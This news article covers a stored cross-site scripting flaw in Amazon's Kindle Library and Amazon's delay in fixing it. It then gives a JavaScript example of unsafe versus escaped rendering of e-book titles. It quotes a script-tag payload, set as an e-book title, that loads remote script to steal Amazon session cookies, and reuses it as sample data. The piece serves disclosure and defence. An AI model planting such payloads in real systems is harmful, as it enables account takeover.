Amazon Won’t Fix A Kindle Exploit That Steals Amazon Credentials

This isn’t good.

Security consultant Benjamin Daniel Mussler at B.FL7.DE claims that Amazon’s Kindle Library is currently vulnerable to XSS (cross-site scripting) attacks, in which malicious code is inserted into the metadata for an e-book and then grabs your credentials for Amazon:

Once an attacker manages to have an e-book (file, document, …) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.

And who is vulnerable to this? Mussler’s answer is this:

Basically, everyone who uses Amazon’s Kindle Library to store e-books or to deliver them to a Kindle.

However, users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.

Users who stick to e-books sold and delivered by Amazon should be safe, unless there’s another oversight on Amazon’s part, such as the one described here: <http://drwetter.eu/amazon/>

Lovely. What’s worse is that Mussler reported this to Amazon last year and it was fixed. But according to him, it has returned, and Amazon has neither fixed it nor responded to him since he reported it again in early July. Thus he’s gone public.

One thing to consider is that popular e-book reader Calibre had the same issue and it was fixed within four hours of it being reported by Mussler. So one has to wonder why Amazon is taking so long.
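
To make the class of bug concrete, here is an added example (not code from Amazon, Calibre or Mussler) that shows a library listing built by pasting the e-book title into HTML, next to a version that encodes the title on output. The function names and the sample library are constructed for illustration; the second title is the one quoted above.

```javascript
// Added example: hypothetical function names, constructed sample data.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable pattern: the title from the e-book's metadata is pasted into markup as-is.
function renderLibraryUnsafe(books) {
  return books.map((b) => `<li title="${b.title}">${b.title}</li>`).join("\n");
}

// Hardened pattern: every metadata field is encoded at the point of output.
function renderLibrarySafe(books) {
  return books
    .map((b) => `<li title="${escapeHtml(b.title)}">${escapeHtml(b.title)}</li>`)
    .join("\n");
}

// Triage helper: list items whose title contains markup-significant characters,
// e.g. to review documents that were stored before output encoding was in place.
function findSuspiciousTitles(books) {
  return books.filter((b) => /[<>"]/.test(String(b.title))).map((b) => b.id);
}

// Constructed sample library; the second title is the one quoted in the article.
const sampleLibrary = [
  { id: 1, title: "Moby-Dick; or, The Whale" },
  { id: 2, title: '<script src="https://www.example.org/script.js"></script>' },
  { id: 3, title: "Tom & Jerry's Guide" },
];

console.log(renderLibraryUnsafe(sampleLibrary));
console.log(renderLibrarySafe(sampleLibrary));
console.log(findSuspiciousTitles(sampleLibrary));
```

In the hardened output the title is displayed as literal text, so legitimate titles containing `&` or apostrophes still display correctly while markup in metadata is never interpreted by the browser.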
